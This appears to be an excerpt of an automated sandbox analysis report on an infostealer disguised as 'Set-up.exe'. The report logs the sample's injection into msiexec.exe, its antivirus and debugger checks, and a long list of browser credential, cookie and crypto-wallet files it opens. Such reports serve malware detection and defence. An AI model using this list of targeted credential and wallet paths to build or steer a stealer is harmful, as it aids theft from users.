                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BBD9B6F __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__doserrno,_errno,__lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,__lseeki64_nolock,5_2_6BBD9B6F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BBDAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,5_2_6BBDAD2C
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 8_2_6BC43727 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,8_2_6BC43727

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe NtSetInformationThread: Direct from: 0x6C5D62B9
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe NtProtectVirtualMemory: Direct from: 0x76EF63E1
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
                    Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read write
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: DF9330
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3193008
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 309A008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: Set-up.exe, 00000005.00000002.2020365738.000000006C32E000.00000002.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: n+lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,5_2_6BB673B4
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6BBDF356
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,5_2_6BB652E4
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6BBDF2EF
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,5_2_6BB67270
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,5_2_6BB6767A
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,5_2_6BB6750C
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: _Getdateorder,___lc_handle_func,GetLocaleInfoW,8_2_6BC3B33D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_00855FBB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00855FBB
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB762FC _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,_strlen,_malloc_crt,_strlen,strcpy_s,__invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,5_2_6BB762FC
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB9BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,5_2_6BB9BE38
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Windows\SysWOW64\msiexec.exe Directory queried: C:\Users\user\Documents
                    Source: C:\Windows\SysWOW64\msiexec.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB

                    Remote Access Functionality

